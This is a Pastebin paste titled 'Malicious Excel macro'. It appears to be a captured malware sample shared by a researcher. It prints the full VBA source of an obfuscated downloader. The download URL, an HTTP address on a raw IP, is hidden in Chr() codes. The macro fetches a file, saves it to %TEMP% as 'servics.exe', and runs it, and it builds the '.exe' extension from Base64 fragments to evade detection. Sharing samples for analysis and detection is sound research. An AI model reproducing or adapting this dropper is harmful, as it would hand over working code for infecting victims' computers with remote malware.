Advertisement
dynamoo

Malicious Excel macro

Dec 23rd, 2014
420
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sub parent()
  2. Dim WshShell
  3. Set WshShell = CreateObject("WScript.Shell")
  4. PathToSave = "%TEMP%"
  5. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
  6. Set s = CreateObject("ADODB.Stream")
  7.     strFileURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(57) & Chr(53) & Chr(46) & Chr(49) & Chr(54) & Chr(51) & Chr(46) & Chr(49) & Chr(50) & Chr(49) & Chr(46) & Chr(50) & Chr(55) & Chr(58) & Chr(56) & Chr(48) & Chr(56) & Chr(48) & Chr(47) & Chr(115) & Chr(115) & Chr(116) & Chr(97) & Chr(116) & Chr(47) & Chr(108) & Chr(108) & Chr(100) & Chr(118) & Chr(115) & Chr(46) & Chr(112) & Chr(104) & Chr(112)
  8.  
  9.  
  10.     strHDLocation = PathToSave & "servics." & Chr(101) & Chr(120) & Chr(101)
  11.  
  12.  k = janu(strFileURL,strHDLocation)
  13.  Set fso = CreateObject("Scripting.FileSystemObject")
  14.  
  15. If (fso.FileExists(strHDLocation)) Then
  16.   CreateObject("WScript.Shell").run PathToSave & "servics." & Base64Decode("ZQ==") & Base64Decode("eA==") & "e"
  17. End If
  18. Set fso = Nothing
  19. End sub
  20.  
  21.  Function Base64Decode(ByVal base64String)
  22.  
  23.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  24.   Dim dataLength, sOut, groupBegin
  25.  
  26.  
  27.   base64String = Replace(base64String, vbCrLf, "")
  28.   base64String = Replace(base64String, vbTab, "")
  29.   base64String = Replace(base64String, " ", "")
  30.  
  31.   dataLength = Len(base64String)
  32.   If dataLength Mod 4 <> 0 Then
  33.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
  34.     Exit Function
  35.   End If
  36.  
  37.   For groupBegin = 1 To dataLength Step 4
  38.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  39.     numDataBytes = 3
  40.     nGroup = 0
  41.  
  42.     For CharCounter = 0 To 3
  43.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  44.  
  45.       If thisChar = "=" Then
  46.         numDataBytes = numDataBytes - 1
  47.         thisData = 0
  48.       Else
  49.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  50.       End If
  51.       If thisData = -1 Then
  52.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
  53.         Exit Function
  54.       End If
  55.  
  56.       nGroup = 64 * nGroup + thisData
  57.     Next
  58.    
  59.  
  60.     nGroup = Hex(nGroup)
  61.    
  62.     nGroup = String(6 - Len(nGroup), "0") & nGroup
  63.    
  64.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
  65.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
  66.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
  67.    
  68.  
  69.     sOut = sOut & Left(pOut, numDataBytes)
  70.   Next
  71.  
  72.   Base64Decode = sOut
  73. End Function
  74.  
  75.    function janu(strFileURL,strHDLocation)
  76.    Set walabapoi = CreateObject("MsXmL2.xMLhTtP")
  77.  
  78.     walabapoi.open "GET", strFileURL, false
  79.     walabapoi.send()
  80.  
  81.     If walabapoi.Status = 200 Then
  82.       Set Newujapi = CreateObject("AdOdB.sTrEam")
  83.       Newujapi.Open
  84.       Newujapi.Type = 1
  85.  
  86.       Newujapi.Write walabapoi.ResponseBody
  87.       Newujapi.Position = 0    
  88.  
  89.       Newujapi.SaveToFile strHDLocation, 2
  90.       Newujapi.Close
  91.       Set Newujapi = Nothing
  92.     End if
  93.  
  94.     Set walabapoi = Nothing
  95.  
  96.  end function
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement